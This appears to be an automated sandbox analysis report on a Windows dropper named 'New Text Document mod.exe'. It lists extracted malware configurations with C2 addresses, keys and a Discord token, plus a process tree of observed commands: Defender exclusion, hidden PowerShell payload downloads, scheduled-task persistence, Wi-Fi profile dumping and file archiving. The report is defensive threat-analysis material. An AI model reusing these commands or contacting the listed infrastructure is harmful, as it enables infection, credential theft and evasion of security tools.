Resubmissions

16-12-2024 05:27

241216-f5kx6awmh1 10

14-12-2024 20:23

241214-y6jqlasrhy 10

14-12-2024 20:22

241214-y51bysvmbk 10

14-12-2024 20:13

241214-yzc98svkfr 10

14-12-2024 13:14

241214-qgw1masrcy 10

14-12-2024 13:12

241214-qfk7qsvlaq 3

12-12-2024 18:19

241212-wymq6ssnat 10

12-12-2024 18:16

241212-www7tssmet 10

Analysis

  • max time kernel
    1197s
  • max time network
    1200s
  • platform
    windows7_x64
  • resource
    win7-20240903-es
  • resource tags

    arch:x64arch:x86image:win7-20240903-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    14-12-2024 20:23

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.141.26.234:7000

Mutex

2XLzSYLZvUJjDK3V

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Java Update (32bit).exe

aes.plain

Extracted

Family

redline

Botnet

fvcxcx

C2

185.81.68.147:1912

Extracted

Family

metasploit

Version

metasploit_stager

C2

176.122.27.90:8888

Extracted

Family

quasar

Version

1.4.1

Botnet

Windows Client

C2

148.163.102.170:4782

Mutex

4c18e02c-7c39-4a5e-bbef-16fe13828101

Attributes
  • encryption_key

    73B0A3AC50C78E243EA93BF9E60C9BC63D63CA26

  • install_name

    Sever Startup.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Startup

  • subdirectory

    Windows Startup

Extracted

Family

redline

Botnet

eewx

C2

185.81.68.147:1912

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

82.64.156.123:80

Mutex

22fbcdf1-92c4-4afa-81b3-8940a1676372

Attributes
  • encryption_key

    030FEA14D8B12C3F86A426D37EB0940C8225BBC8

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

82.64.156.123:80

Mutex

9mzImB3NUR0Q

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMxNTQxMDg0NDg3NTQ4OTI4MA.Gx5ptK.HY1OYsjGMP1MsOoyD2E7T9pCvkfHTdOPozmb_c

  • server_id

    1315411300192616569

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Merlin

    Merlin is a cross-platform post-exploitation C2 framework written in golang.

  • Merlin family
  • Merlin payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Redline family
  • UAC bypass 3 TTPs 7 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Adds policy Run key to start application 2 TTPs 14 IoCs
  • Blocklisted process makes network request 18 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 25 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 23 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 21 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 5 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 39 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 1 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • Modifies system certificate store 2 TTPs 18 IoCs
  • Runs ping.exe 1 TTPs 19 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      PID:880
    • C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe
      "C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1488
    • C:\Users\Admin\AppData\Local\Temp\a\x.exe
      "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\x.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1828
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2516
    • C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe
      "C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:884
    • C:\Users\Admin\AppData\Local\Temp\a\system32.exe
      "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Users\Admin\AppData\Local\Temp\a\system32.exe
        "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2884
    • C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:8636
    • C:\Users\Admin\AppData\Local\Temp\a\Update.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:8696
    • C:\Users\Admin\AppData\Local\Temp\a\main.exe
      "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:9076
      • C:\Users\Admin\AppData\Local\Temp\a\main.exe
        "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2656
    • C:\Users\Admin\AppData\Local\Temp\a\tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\a\tmp.exe"
      2⤵
      • Executes dropped EXE
      PID:9104
    • C:\Users\Admin\AppData\Local\Temp\a\shost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:3964
      • C:\Users\Admin\AppData\Local\Temp\a\shost.exe
        "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:4796
    • C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
      "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:4924
      • C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
        "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:5544
    • C:\Users\Admin\AppData\Local\Temp\a\phost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:5672
      • C:\Users\Admin\AppData\Local\Temp\a\phost.exe
        "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:5888
    • C:\Users\Admin\AppData\Local\Temp\a\in.exe
      "C:\Users\Admin\AppData\Local\Temp\a\in.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:5952
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6D05.tmp\6D06.tmp\6D07.bat C:\Users\Admin\AppData\Local\Temp\a\in.exe"
        3⤵
          PID:6032
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:6104
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:6356
          • C:\Windows\system32\calc.exe
            calc.exe
            4⤵
              PID:6544
        • C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe
          "C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          PID:6596
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
            3⤵
            • Enumerates connected drives
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:6668
        • C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe
          "C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:7352
          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:7432
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
              4⤵
              • System Location Discovery: System Language Discovery
              PID:7776
        • C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe
          "C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe"
          2⤵
          • Executes dropped EXE
          PID:3088
          • C:\Windows\system32\schtasks.exe
            "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4092
          • C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
            "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            PID:4272
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4444
        • C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe
          "C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          PID:3572
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
            3⤵
            • Enumerates connected drives
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of FindShellTrayWindow
            PID:3696
        • C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
          "C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          PID:8012
          • C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
            "C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
            3⤵
            • Executes dropped EXE
            PID:8704
        • C:\Users\Admin\AppData\Local\Temp\a\null.exe
          "C:\Users\Admin\AppData\Local\Temp\a\null.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:8164
          • C:\Users\Admin\AppData\Local\Temp\a\null.exe
            "C:\Users\Admin\AppData\Local\Temp\a\null.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:9084
        • C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe
          "C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:8276
        • C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe
          "C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:1596
        • C:\Users\Admin\AppData\Local\Temp\a\ssg.exe
          "C:\Users\Admin\AppData\Local\Temp\a\ssg.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:644
        • C:\Users\Admin\AppData\Local\Temp\a\xx.exe
          "C:\Users\Admin\AppData\Local\Temp\a\xx.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:8436
        • C:\Users\Admin\AppData\Local\Temp\a\cx.exe
          "C:\Users\Admin\AppData\Local\Temp\a\cx.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:8472
        • C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe
          "C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:8552
        • C:\Users\Admin\AppData\Local\Temp\a\dropper.exe
          "C:\Users\Admin\AppData\Local\Temp\a\dropper.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:8612
        • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
          "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:8772
          • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
            "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
            3⤵
              PID:372
            • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
              "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
              3⤵
                PID:1780
              • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
                "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
                3⤵
                  PID:2540
                • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
                  3⤵
                    PID:2244
                  • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
                    "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
                    3⤵
                      PID:2492
                  • C:\Users\Admin\AppData\Local\Temp\a\ctx.exe
                    "C:\Users\Admin\AppData\Local\Temp\a\ctx.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Windows directory
                    • Suspicious use of FindShellTrayWindow
                    PID:8868
                    • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                      "C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:8900
                      • C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
                        4⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:9108
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3576
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          5⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3596
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            6⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Network Configuration Discovery: Wi-Fi Discovery
                            PID:3620
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\063565911205_Desktop.zip' -CompressionLevel Optimal
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2404
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                        4⤵
                        • Blocklisted process makes network request
                        • System Location Discovery: System Language Discovery
                        PID:4236
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                        4⤵
                        • Blocklisted process makes network request
                        • System Location Discovery: System Language Discovery
                        PID:4512
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2252
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          5⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          PID:6444
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            6⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Network Configuration Discovery: Wi-Fi Discovery
                            PID:6508
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\063565911205_Desktop.zip' -CompressionLevel Optimal
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:7020
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                        4⤵
                        • Blocklisted process makes network request
                        • System Location Discovery: System Language Discovery
                        PID:7680
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                        4⤵
                        • Blocklisted process makes network request
                        • System Location Discovery: System Language Discovery
                        PID:8972
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                        4⤵
                        • Blocklisted process makes network request
                        • System Location Discovery: System Language Discovery
                        PID:4148
                      • C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
                        4⤵
                          PID:4360
                          • C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
                            5⤵
                              PID:2052
                          • C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:4060
                          • C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
                            4⤵
                              PID:3460
                              • C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
                                "C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
                                5⤵
                                  PID:3552
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:7900
                              • C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe
                                "C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4920
                          • C:\Users\Admin\AppData\Local\Temp\a\vvv.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\vvv.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:8844
                          • C:\Users\Admin\AppData\Local\Temp\a\connect.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\connect.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3188
                          • C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe"
                            2⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            PID:3312
                          • C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe"
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:4440
                          • C:\Users\Admin\AppData\Local\Temp\a\random.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:4636
                            • C:\Windows\system32\cmd.exe
                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                              3⤵
                                PID:5020
                                • C:\Windows\system32\mode.com
                                  mode 65,10
                                  4⤵
                                    PID:5048
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5076
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_7.zip -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5140
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_6.zip -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5212
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_5.zip -oextracted
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5248
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
